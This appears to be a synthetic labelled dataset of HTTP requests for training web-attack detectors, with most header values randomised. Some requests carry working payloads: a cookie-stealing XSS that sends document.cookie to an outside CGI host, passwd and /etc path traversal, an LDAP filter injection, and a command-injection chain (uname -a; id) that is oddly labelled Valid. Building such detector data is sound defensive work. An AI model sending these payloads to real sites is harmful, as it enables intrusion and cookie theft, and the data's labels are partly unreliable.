GET /mailc38hLjGL8Bu/tGcwRF.2cZ/a7BkjwvY-4kFROs5/httpGiXxt/nullX.gif?uii=utxdyxeyaofiiey9&lsaYcndAeroft=%2Fe&tjecp0s7gngkn5=++%3B+++++echo++++%3B++w++%3B++uname+++-a++++%3B++id&h3dEoi=27466&ats9OEecu6pn=473970&PBLGKacceptl=%3AsOtmpcewr%3Bwruy&0a4cmdagmocha5cUbgsoundln=xretu94zasew6&EnestU3hwdues=tbsef%26&aah=296&l9em6w=36031812&ehsasfte4=foZA HTTP/1.0
Host: www.crtLisAw4.st:80
Connection: evnl
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, gzip;q=0.0, identity;q=0.1, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 214.70.1.175
Cookie: 3uedropbE=9208;IM1tagrrr=hap-Ca;weobfrl1tc=yT8 sio e$v
Cookie2: $Version="9"
Date: Tue, 25 Jan 05 01:43:15 UTC
ETag: W/"IRDWyMlE6.clcPc7DJep"
Expect: hhdoic
From: sLseahcS@fLazt.org
If-Modified-Since: Sun, 12 Jul 09 19:21:06 CET
If-Unmodified-Since: Fri, 27 Jan 06 09:35:47 GMT
If-Match: *
If-None-Match: "8ghp6dkd5PT6QcxKx3jU"
If-Range: Fri, 07 Apr 06 06:14:10 CET
Max-Forwards: 3875
MIME-Version: 1.5
Pragma: renh6='EEo'
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: 2wgtl ehdncs=dunee
Range: -983461,45-31195
Referer: http://www.eauodm.de/szuhsats.asmx
TE: chunked,deflate;q=0.9,trailers
Trailer: Expect
User-Agent: Mozilla/3.7 (compatible; MSIE 9.0; WinNT; rntqsgo)
UA-CPU: PowerPC
UA-Disp: 230,276,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5688x504
Via: 2.8 170.106.50.102:3337
Transfer-Encoding: identity
Upgrade: 5aRp/4.4, fqts/9.9, eeo/3.4, hho/0.4, pitko/1.5
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 00610632074
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43536
Start - Id: 27403
class: Valid
GET /wunion/ebBOqtp0f/sOspgNsuUCrEsbs7oIre/ogTnCQ-YA2aLaWOt/UNu80/JI_D.US.css?f8ntnieinecsOsi=hd-c&deacack=52678&otobeCroguu6=e+aodnwu&shdoaetcde1rd=0128120&sgSo4yyZlt=tbht3nCiasF&grsn=66827080&d1at=n-mjqpJUGo&tHe=a0r&9itp6pfq=irOpLzpOnrFm&lauei9Dotplita=em9Etsrte&u_processing-instructionAON6ZM=8inopenenbecopy&a6bee3tiref=qmg3&unril2iO=ntrablnd4re+&dtaaseniueycTaD=668873&tdslient=eCtwhohmtttse0au HTTP/1.0
Host: www.odCjrih2.com
Connection: qown7iu
Accept: application/zip;q=0.7
Accept-Charset: isiri-3342;q=0.5, windows-1252, iso-8859-1, x-mac-japanese;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-age=358
Client-ip: 8.187.156.127
Cookie: eoes1zuN1mnr=tNal;ecOe8tzAwoa=fkGmQPTM53W2;usoroeNeragcb=er ;FPsystem3fsSallyHNf=kmooeyc;sUehDi3omia=En:ae>aidp=fa2dropftpgsfyboot.ini
Cookie2: $Version="5"
Date: Tue, 11 Mar 08 22:55:30 UTC
ETag: "OA6LdaqSRCAjkeXw1Yp"
Expect: 100-continue
From: glqntj@hA8egh.fr
If-Modified-Since: Fri, 21 Dec 07 22:27:45 GMT
If-Unmodified-Since: Tue, 18 Mar 08 21:54:26 GMT
If-Match: "CPvOO72Cz7xZY4_"
If-None-Match: *
If-Range: "tpdt.Hmhgi6LhGfGQ"
Max-Forwards: 153
MIME-Version: 8.4
Pragma: atloL='zaa5toi'
Proxy-Authorization: Basic ZmFpbXQ6ZXQxU3I=
Authorization: rwao thatc=Cptqz
Range: 126073-82729,58-840514,56-
Referer: http://www.rnhew.de/Mmkistbe/rlnaO.conf
TE: trailers,trailers,deflate
Trailer: Host
User-Agent: Mozilla/4.5 (compatible; Ngrc; WinNT; xgIt; tilrrEj)
UA-CPU: 68000
UA-Disp: 009,2103,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 9698x542
Via: 7.0 www.tftm.tiff, FTP/2.5 www.mLdestl3.htm, FTP/1.6 18.202.223.104
Transfer-Encoding: deflate
Upgrade: anhok/6.7, tgihE/5.8
Warning: 680 www.tdeh77g.gif "z1eLBiT0" 
X-Forwarded-For: 96.144.180.117
X-Serial-Number: 012150343166763006
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27403
Start - Id: 46107
class: PathTransversal
POST /sRkTuAuBaCsRkh5IvbmH/nMhw.jpeg? HTTP/1.0
Content-Length: 189
Content-Language: 9eua,eel5,rhwt1snd
Content-Encoding: gzip
Content-Location: http://tCtkMi.biz/ha5ag/eAf4Ua/sivxak/hglle/yeae.png
Content-MD5: bmRvZXI3b2VkcWFlZVRldA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 06 May 06 09:26:31 UTC
Last-Modified: Tue, 06 May 08 15:40:14 UTC
Host: www.seEaoez.st
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-10646-ucs-2, macintosh, euc-cn;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 78.173.68.149
Cookie: LCphpSounionKopenqJ=309;rn=tUeXyVt7X;0eeataoqa=nodei0a51-ttls3+twtPn;y7ieITlq1ltydt=d;lensosnl4n8udn=s;tCZnm.yU==D;
Cookie2: $Version="6"
Date: Mon, 10 Nov 08 10:38:04 UTC
ETag: W/"RQOwSVWoeJGj0tXwiO"
Expect: rXsedfef
From: narzg@bt0e.st
If-Modified-Since: Sat, 13 Dec 08 17:53:18 GMT
If-Unmodified-Since: Sun, 04 Jan 09 18:18:42 CET
If-Match: "7daUXr4sMREv4k@w11R"
If-None-Match: "eaDJv2vn9mMXRHLOE"
If-Range: "4_a59mis0.FZK-Vj._sj"
Max-Forwards: 29
MIME-Version: 0.9
Pragma: r=vp
Proxy-Authorization: NTLM N3lkaXZoNXRmcmFuaG9sYWRuYWlkbm90YW9lZHBqZUlob0F5ZU5h
Authorization: Digest uri=http://www.wuCi.uk/Ab4jhqe/loemhf/deenLse/6tobu.php
Range: -03018,-4474
Referer: http://www.rtts0ine.com/aAenoonA/bschum/hgUsftae/taiojqE3.txt
TE: chunked;q=0.0,chunked,trailers
Trailer: If-Match
User-Agent: Mozilla/5.6 (compatible; Konqueror/9.7; Win98; qio3; wtpuelie; 7sntbnvrrO)
UA-CPU: StrongARM
UA-Disp: 013,8329,8
UA-Color: color16
UA-Pixels: 1090x096
Via: FTP/7.0 www.ag4QOTl.png, 5.5 185.111.24.26, eennh/5.7 185.15.65.49
Transfer-Encoding: gzip
Upgrade: cRpj/3.7
Warning: 607 42.242.50.182 "p8wLrga" "Tue, 06 Dec 05 03:24:33 CET"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

anTdnilR=ia&tiir=oc&gt1fxyzmfrspsX=/,,,/dhrisa/ldfi/passwd&-xbpG.RC=864678&e26nRTs6ln=ieT svbscript&eeqy=8929&c0= 7\r]cralfi~ikht ttE&mtTbt1=lem&tptdTxrbthYemmt=11737461

End - Id: 46107
Start - Id: 20093
class: Valid
GET /eawmttsEatnrehtd9/otatAljh38m/isx75/therpotxdoEe/eL2sPtI0B.php?McFWYMStMbconnect=4982865833&eoedhfesa=666&ThjelnVo=68171135&6ooed=cmae&xu=68733841&rslceanehaRxbat=bzsfyyuni&qaiafwiliaeciyq=73734672&ndti7a2etno3Er=Leservicesio HTTP/1.1
Host: 116.4.197.37
Connection: close
Accept: */*;q=0.0
Accept-Charset: isiri-3342;q=0.1, utf-8;q=0.3, iso-8859-6
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 169.165.192.127
Cookie: UYn0ErTlink1k=stding;VbvmetaBP8=nwotve&s;hnEuqu=1;842wLnNcrth07o=i5eoriooemeln;ome=e.zFvUauk_;sw4HEices=xpN9O
Cookie2: $Version="909"
Date: Wed, 16 Feb 05 11:47:58 UTC
ETag: W/"InLmNrspdw.1xvScYZo"
Expect: dejhuunp=8aiomto;iNwu5
From: alaua@llalec.uk
If-Modified-Since: Sat, 02 Jan 10 06:51:37 CET
If-Unmodified-Since: Tue, 27 Apr 10 24:01:46 GMT
If-Match: "xxL8Ebnzo4EDeDDva.T"
If-None-Match: *
If-Range: *
Max-Forwards: 603
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: 3yfk imtcaoan=ttnt
Authorization: Basic dGZOc3JkOnFydHBoZWZv
Range: 41-,-67213
Referer: /hekncEf/eaen/paoe/dthkeSoc.wmn
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/2.1 (compatible; 0ooO; WinNT; xfrchd3Ei; vesAnx51n)
UA-CPU: Sparc
UA-Disp: 894,918,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5910x691
Via: 7.2 www.hlsq.gif, 6.3 79.235.42.144:1
Transfer-Encoding: eotroe
Upgrade: uce/2.3, tNT/0.5, 4Yfn/7.0, chae/1.4, ye1/1.6
Warning: 223 241.60.75.35 "5tsnebAiy" 
X-Forwarded-For: 171.141.7.56
X-Serial-Number: 9909201039312
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 20093
Start - Id: 8280
class: Valid
GET /wgKtbX9Q8/eBGU2adXtBYSOl.sh?astlaCeoeMuC=wa9drdas&d1eEyonoudIaa=ywt0yAoti%24bodyoz&1wY6m6access_log_=3f4+&arvslhN=rtnYiatpgadet&usuRoneeT6I=i&tHmeitHaui0z=76&Wdsbt2iHr=6707893342 HTTP/1.1
Host: 113.131.226.98
Connection: keep-alive
Accept: application/*
Accept-Charset: big5, x-mac-ce, euc-kr, x-mac-chinesetrad;q=0.5
Accept-Encoding: compress;q=0.9, identity;q=0.6, deflate;q=0.6
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 4.247.143.148
Cookie: RyoJuGh4=ts6y?ko0se5o7e;p6esaretolq=si01mGzfInoi
Cookie2: $Version="106"
Date: Fri, 08 Jul 05 06:46:45 UTC
ETag: "seD7mRxuD_w-aACyEc"
Expect: 100-continue
From: hiDbh@eMCsorant.biz
If-Modified-Since: Thu, 16 Sep 04 24:58:05 CET
If-Unmodified-Since: Wed, 06 Jan 10 17:05:33 GMT
If-Match: "UMuDh0@OVd3-6KXL"
If-None-Match: "y.aglVKAIr3e2JDHOm6"
If-Range: *
Max-Forwards: 901
MIME-Version: 1.1
Pragma: d='ean'
Proxy-Authorization: hneac RsObjne=6etooNn8
Authorization: leoeBa aldeate5=5BsE
Range: -786,-6625
Referer: /3ErsoAs/vBei15oi/zG8a/kmdiodes/ete6r.mpeg
TE: trailers,gzip,trailers
Trailer: Accept-Language
User-Agent: E9ei (irKZSI)
UA-CPU: Sparc
UA-Disp: 260,910,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 833x678
Via: 4.0 191.3.110.133:06, 1.8 108.107.63.113, 4.9 82.184.104.233:52710
Transfer-Encoding: trdah
Upgrade: n83/8.7, wpeioz/2.0, Rbtic5/8.3, s4h/9.8
Warning: 511 www.4eiedl.jpg "iyeseuen99unse7mytth" 
X-Forwarded-For: 9.228.133.238
X-Serial-Number: 538548
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8280
Start - Id: 36337
class: PathTransversal
GET /ra/wrT5ie9ekoaTbt/qh/nVHpuR36D@7K5UMj2F/xterbi0eapSu/xrhbnatucsedsa78my/a4ocCH_6TcwVELv6P8b/ieomce6ap1a4d/-XSXVEvF-pHt/reedysatghrl/9dm.tiff?qNVscriptC2=y-g17DTtB&aLsbSn=tpneTlyve&wjaatSmadgxfoo=esrk&VwdanduKQKeH=iageFth&nIgp=el9cg+EOaoa+&5lrna7=nBfi&syYml=NrtftnhwOam&qoanaohhodk=hhrnBudo&ebnkenyir5ranc=811141962&9itomfs=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2FoiO6.conf&eia6fEeaz=eRnnaamhdwi&esaznarrHc6tor=7&utsfa=tw%7Cgr&ludUdaNs=rhubipe HTTP/1.1
Host: 117.106.7.247
Connection: so5nQna2
Accept: audio/x-wav, application/postscript;q=0.2, video/mpeg
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: elihjpj-mduyac
Cache-Control: no-store
Client-ip: 179.242.140.245
Cookie: tleDraroftytira=?ter;aotMlreXtPi1=nveTcb;RYlogK5jPtX2P=52246655
Cookie2: $Version="046"
Date: Wed, 25 Feb 09 05:47:21 CET
ETag: W/"tsYw13ebqOwIYmPl_3q"
Expect: 100-continue
From: imeua@eefaielgto.it
If-Modified-Since: Sun, 21 Mar 10 23:58:12 GMT
If-Unmodified-Since: Tue, 14 Sep 04 23:27:34 GMT
If-Match: *
If-None-Match: "othgk8Zr41xdFW1cnjFU"
If-Range: ".EK8LPwHe3nrwYsMSq"
Max-Forwards: 4325
MIME-Version: 4.2
Pragma: 3imqod4l='xyeh'
Proxy-Authorization: Digest response="Fa230DfDdCBDc8d6dFdD9e980dE5c6ab"
Authorization: Basic dGVpZjpyb2V5
Range: 94941-674,-88804,1546-98301
Referer: http://sdos.it/trhwtne/h5z6rew/n8nHisco/znsaia/nenEr.shtml
TE: trailers
Trailer: User-Agent
User-Agent: l3oRTV_ http://www.Thtl.be
UA-CPU: PowerPC
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 625x983
Via: eryte/3.8 www.iyrrP.css:5320, 9.3 109.182.26.199, FTP/2.4 www.9ts7.css
Transfer-Encoding: identity
Upgrade: itor/5.7, 4up4ta/3.2
Warning: 187 www.erlho.html "TnrEu" "Thu, 07 Sep 06 16:36:18 GMT"
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 9001886715622
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36337
Start - Id: 47344
class: XSS
GET /ohmenrLysmotteiwihae.mdb?0S0=rweeyioemtrt4&ch78e=24&bsahH=2A7replacecLi1%7C%3CCpositionse1n%3F&ti=adminyf&ea=%3Cimg+++src%3D++++%22icdeerlitr+%3E+++%22++onmouseover+++%3D+++%22++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.inti.com%2Fcgi-bin%2Fronarind.cgi%27%2Bdocument.cookie%29%3B%5D+++%22+%3E&yepi=s%3Cnn&aotxaf6w=t&ykhsr7gea=e%40gfSYVB7aMB HTTP/1.1
Host: www.la8wmIsgr.it
Connection: mdmzIa
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: aeStTaA-deqstns, nh84kt-tam0mf;q=0.7, retT-IdeSoD9;q=0.0, or-irshmO, s-Theet
Cache-Control: no-transform
Client-ip: 108.182.85.89
Cookie: neofs5arimtno=lsanybtsjeth;tsemimz=u5Naat]de8ehwfw[;x0F.S=sf(ni[;ijertnqARdxa=eydteNvpotr;ahlne=[wig
Cookie2: $Version="38"
Date: Mon, 04 Jun 07 21:55:28 CET
ETag: W/"@ohBoT1s.JGyaGLB2"
Expect: 100-continue
From: Ecnsai@ss9aup.gov
If-Modified-Since: Sun, 04 May 08 22:32:47 GMT
If-Unmodified-Since: Fri, 02 Sep 05 03:03:40 GMT
If-Match: "W@SFa1Soj@Xczg13"
If-None-Match: "H.7ieAko@6GK25PU_Sca"
If-Range: *
Max-Forwards: 8568
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Basic cmlvYlNhZVg6bm1kbW1saQ==
Range: -066761,152-
Referer: /sntnsto/nnhtir.swf
TE: trailers,trailers,deflate
Trailer: If-Match
User-Agent: 3acnofdohyoAatt
UA-CPU: MIPS
UA-Disp: 699,6656,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 575x5791
Via: FTP/5.9 176.31.159.123:6
Transfer-Encoding: identity
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 030 32.43.121.212 "zsmp" 
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47344
Start - Id: 30665
class: Valid
GET /TM1/gEttaoexykpds/verrce.html?ShLov6=3qdetvio6tnon9&T4_6N3FCRh=4853022&JacceptkS=isovactllib+4ovi&td0aqaayxlyrfl=t+styledelete&wiOesj=0nTtoe-&lEZShTYE=dbtt2Xet5R HTTP/1.0
Host: www.Ieotop7.biz
Connection: ke1die4
Accept: application/*;q=0.2, video/*;q=0.9, image/gif
Accept-Charset: iso-8859-4;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=025
Client-ip: 245.173.208.221
Cookie: ID9zHU9kI=h\between;2zplKJ=heN;tTCgsi1nErhw=iddxyy9oytEaJsi]srf
Cookie2: $Version="84"
Date: Sun, 22 Feb 09 17:52:56 CET
ETag: W/"oh1wEY@upMY@dYuAu"
Expect: oaehehs
From: bsesam@1t0hn.biz
If-Modified-Since: Sat, 15 Sep 07 15:11:42 GMT
If-Unmodified-Since: Fri, 20 Apr 07 10:40:34 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 19 Feb 10 08:01:54 UTC
Max-Forwards: 3
MIME-Version: 1.3
Pragma: l=efwakt
Proxy-Authorization: otnae s4trl2e=Mefno
Authorization: lam5ts itgemw=neidai
Range: 69794-,-704
Referer: /0yel.cgi
TE: chunked,trailers,trailers
Trailer: Date
User-Agent: Mozilla/5.7 (Windows; U; Win98 6.5; it-HW; rv:0.3.9) Gecko/88101963
UA-CPU: PowerPC
UA-Disp: 7934,865,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7462x1873
Via: FTP/6.1 www.asx0.css
Transfer-Encoding: gzip
Upgrade: eMR/0.4, Xw1Rp/0.0, t9se4/2.1, chf/5.5, oF4di/5.3
Warning: 045 162.99.200.1 "itsfee" 
X-Forwarded-For: 21.250.209.193
X-Serial-Number: 62673072943112918
----: ------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 30665
Start - Id: 38420
class: LdapInjection
GET /deb/asnr3rtasH4ne/trfeuJBXl5eWZ.8_Nw/irisdat8a9Ss/aNnAKNa/tb.php3?soeTntwo=%2Bweiniframetokz%26&amstRt=tdCa5%29%28+%7C++%28tliA%3D*%29&huh7ehnAzte=h6Z HTTP/1.0
Host: www.dsoe.be
Connection: eien
Accept: audio/x-wav;q=0.8, image/*
Accept-Charset: windows-1258;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-age=6
Client-ip: 169.13.143.24
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="88"
Date: Mon, 18 Dec 06 03:30:07 UTC
ETag: "inlhojR2ct_58MrdgM"
Expect: 100-continue
From: r8urdpH@atna.uk
If-Modified-Since: Thu, 09 Dec 04 20:16:55 GMT
If-Unmodified-Since: Thu, 17 Jun 04 10:28:18 UTC
If-Match: "uHDclq5lEGLx96YOP"
If-None-Match: *
If-Range: "76.0B8wc4DlVoo.YzU"
Max-Forwards: 7087
MIME-Version: 0.1
Pragma: s=enaetot
Proxy-Authorization: h80n hmasNo=a0xee
Authorization: 5haicz v8e4hrd=leeaos
Range: -96373
Referer: http://www.heSies.gov/etojt/vetDi/Bpbwde/th5b/snt8nstz.jsp
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.5 (Machintosh; U; Mac OS X 5.8; ur-cb; rv:5.8.4) Gecko/33919186
UA-CPU: MIPS
UA-Disp: 461,871,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0696x1408
Via: 2.6 1.116.253.158, HTTP/3.8 www.epxaNoh.html:625
Transfer-Encoding: deflate
Upgrade: lig/4.2, roeri/4.4
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38420
Start - Id: 83
class: Valid
GET /homex8opensWdFZhtpassYqP0d/nwthnehtlStirngflNTo/uRP/hZfT4uZGNy5A/Scouezr/FgJt@UVa7vswhereHr/slx8mFnIVG/5xEnr1i.php3?Eiframe_nodeeQipnp=6amtIvwl6Ety1f&ulpitoArnEneo=63770689&6ndre1tE9E=r+%3C&0wmeEaei5Rus=917679&reCzeiS2solr5jk=ydnmv&entE=2649476844&7ptm9=z%2Bi&19nohiisrmt=8842&qlte7ttosiFa=sadxbmak&ounecu=pfadminl HTTP/1.0
Host: 187.103.253.220
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: abtnewel-1se0;q=0.1, eRgmp-aserda
Cache-Control: no-store
Client-ip: 91.171.86.36
Cookie: psdlleyfsbh=icguk
Cookie2: $Version="49"
Date: Fri, 28 Jul 06 04:11:14 GMT
ETag: W/"AShFJJomkmXUQfFrlj."
Expect: 100-continue
From: eislseer@gopa.fr
If-Modified-Since: Sun, 21 Nov 04 06:31:58 CET
If-Unmodified-Since: Fri, 27 Apr 07 24:50:54 CET
If-Match: "0xdztmUC-qXNpTdY2P"
If-None-Match: *
If-Range: Mon, 11 Jan 10 22:40:30 CET
Max-Forwards: 780
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest uri=/5Eth/NasEi/4flTue17/eeiv/xfrHtst7.gz
Authorization: Basic cmNqYTo2emVk
Range: 41396-563,553741-
Referer: http://www.tgneh.st/a35a3rm/l5ore/Essmltr/d1osqe/uyiqh.dll
TE: chunked;q=0.8
Trailer: Date
User-Agent: eKsfCf http://www.o0ctso.com
UA-CPU: MIPS
UA-Disp: 4994,968,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5749x1102
Via: FTP/5.5 15.31.80.191
Transfer-Encoding: deflate
Upgrade: plohnd/1.0
Warning: 842 199.4.175.100 "ee1nrfsC0saOb" "Tue, 12 Feb 08 10:26:21 CET"
X-Forwarded-For: 28.137.198.105
X-Serial-Number: 9033271704641075484
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 83
Start - Id: 10827
class: Valid
GET /FL@rdroph3BVLBXR/tlyiMDJ8EXDPFg/wvecm/wA7KyI10s3ip3zPOhrm/eIgCKBX6NmLPOI/u_ma.jpg? HTTP/1.0
Host: www.MugtaosEi.biz
Connection: tHcd
Accept: application/*;q=0.0
Accept-Charset: us-ascii, iso-8859-8;q=0.9, gb2312;q=0.4, x-mac-turkish;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: 3Lsuehu4-ia;q=0.7, wne-eeaA, lm2-jaetoga, 1ydnesd3-algtiw
Cache-Control: min-fresh=45426
Client-ip: 59.172.56.164
Cookie: gW@wIV=h-Kij0kJLz;ostarNai34nvtt=esh;apvcRaguacnm=548823
Cookie2: $Version="9"
Date: Thu, 20 Jul 06 20:25:20 CET
ETag: W/"EAJK8SGgzYLV1svwviMA"
Expect: 100-continue
From: oamhlso@nd4Isktc.be
If-Modified-Since: Fri, 17 Oct 08 20:40:13 CET
If-Unmodified-Since: Fri, 29 Aug 08 19:00:34 UTC
If-Match: "BYz0FzuRmQtz5pB"
If-None-Match: "KGJYu5@1UyyPQtdqfMoD"
If-Range: Sun, 26 Jun 05 12:16:53 GMT
Max-Forwards: 4
MIME-Version: 8.9
Pragma: ugnytsrs='Et'
Proxy-Authorization: NTLM bGRoYWlzQXJ0bmhzYzhrZDVubWthYXNzdWtzZG90c296YW1lc1lyZWRjZWNwZW4=
Authorization: enLnut P6dior3y=Asdt0
Range: 491-
Referer: /uyso/5nsi/n5tEh.txt
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: Mozilla/7.1 (Machintosh; U; Mac OS X 7.0; 8w-2t; rv:5.8.5) Gecko/26434926
UA-CPU: StrongARM
UA-Disp: 751,4229,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 633x671
Via: FTP/3.0 239.255.167.129
Transfer-Encoding: utmt; il5et=etaaPm
Upgrade: 3uen/0.9, a1ts/0.4, sidhd/7.5, fsam/4.5
Warning: 710 www.o4vrf.shtml "azenesqualg1oeEe" 
X-Forwarded-For: 96.51.246.201
X-Serial-Number: 67477074905757
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10827
Start - Id: 6096
class: Valid
PUT /yyspt/cR.UCnl_nAFhlU1Jw.pl? HTTP/1.0
Content-Length: 46
Content-Language: etttoge,4bcNrsp
Content-Encoding: deflate
Content-Location: /reaa/zdihrtz.wav
Content-MD5: dW50ZnRvZHdpV25zc3NkZw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 05 Aug 06 01:17:53 GMT
Last-Modified: Wed, 22 Dec 04 17:40:09 GMT
Host: 32.76.4.38
Connection: close
Accept: text/*;q=0.8, text/html
Accept-Charset: iso-8859-8-i;q=0.5
Accept-Encoding: 
Accept-Language: Th-cnlcEOe;q=0.1, eno6eta-tv;q=0.7
Cache-Control: asuiOhuy=we
Client-ip: 39.222.108.79
Cookie: jza=6tt%osLienodem ;cetUdmidn=atnl;di1natT7nSja=8179
Cookie2: $Version="3"
Date: Tue, 27 May 08 22:42:55 UTC
ETag: "FyD9jloh6p4Fowm9S"
Expect: 100-continue
From: ghtahOkt@redNeaN.biz
If-Modified-Since: Thu, 29 Sep 05 18:36:59 CET
If-Unmodified-Since: Thu, 06 Sep 07 24:48:25 GMT
If-Match: *
If-None-Match: *
If-Range: "n0dee@kZP0dul_I1ivYP"
Max-Forwards: 4
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic eTV0czM6dGR0c2I=
Range: 32908-897936,302-48186
Referer: http://www.iwdae.uk/Swiarbdr/a6id6f.txt
TE: trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: eottrnjt/4.1.1.6.7
UA-CPU: 68000
UA-Disp: 381,9388,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 179x0676
Via: 7.7 www.tkae.css
Transfer-Encoding: identity
Upgrade: qdoi/7.1, etiX/1.2, Sor/4.3, ex2/0.1
Warning: 696 www.rlonIm7H.jpg "dt7r" "Wed, 17 Mar 04 18:58:49 GMT"
X-Forwarded-For: 224.40.113.11
X-Serial-Number: 124878
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

Dxjbnoolahbam=lot&CinThmphaoa=On&tsinpjisi=xJ1

End - Id: 6096
Start - Id: 14619
class: Valid
GET /ptbRhmdrdta/LhCiadpseTbEdo/iB23Xsju6kWyD.LV/tKqQy4PZRN/xRq2TXHYW@S.pRcq2YR/ap2tlgha/ediudTewTmwsefro/dmnnubenosenct/skR/NcznLW9.sh?oooltilu7hz=tmUl1cihzsuo&caaeht0otil6ia=ntsiiwtcer&eml4v0hv=y3gODu&mat=o_y5&nnpa5iero=1&xmlAXvI0Y7Ywc=neaUalltwnfein+6aga&telttfouf=Xgqtt&htirn=5fuotpositionie%3Awhere&ihof4O=cre&Gh@K=nei&6dbhomermnt=oacceptage&DzLUILZCJIh0=dnullheRwget%7C4cetmp HTTP/1.1
Host: 31.125.138.5
Connection: 0aeo47
Accept: video/quicktime, audio/basic;q=0.3
Accept-Charset: x-mac-cyrillic, iso-8859-7;q=0.0, x-mac-ce, iso-8859-4;q=0.8, gb2312
Accept-Encoding: 
Accept-Language: hed-geGn, itAhtE-urnitmj;q=0.1, nrl-th1Evdod;q=0.3, za36Dnbt-sfwaa;q=0.0, uioset-paiGmD
Cache-Control: max-stale
Client-ip: 238.75.53.47
Cookie: fepd=glr
Cookie2: $Version="4"
Date: Sat, 16 Sep 06 02:07:17 UTC
ETag: W/"MfTmS8QQQ3HKD1@"
Expect: sshqti
From: uneUynt@llT9mrd0ie.uk
If-Modified-Since: Sun, 22 Jun 08 08:06:23 GMT
If-Unmodified-Since: Thu, 06 Mar 08 14:14:48 UTC
If-Match: "0-ZN2v9o5mCzunXHPs"
If-None-Match: "TTJxWUzhdCtJpK-"
If-Range: *
Max-Forwards: 500
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic QWVlOGFzRTpENm9lb3p0
Authorization: 2u4i o1fLrr=eaabca
Range: 014236-,328751-67,-519123
Referer: /nhzasIin/orhhter/crpu.png
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: wedetir/7.0.0.9
UA-CPU: PowerPC
UA-Disp: 1652,237,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2347x669
Via: 3.0 121.46.100.43, 6.4 94.235.57.250:05, FTP/9.4 218.133.241.150
Transfer-Encoding: p9wih; hbNsh8D=rg4wEanB
Upgrade: ety/4.8
Warning: 533 www.h8lse.jpeg "1t1horto" 
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 28910349808
----: ------------------------------------------------
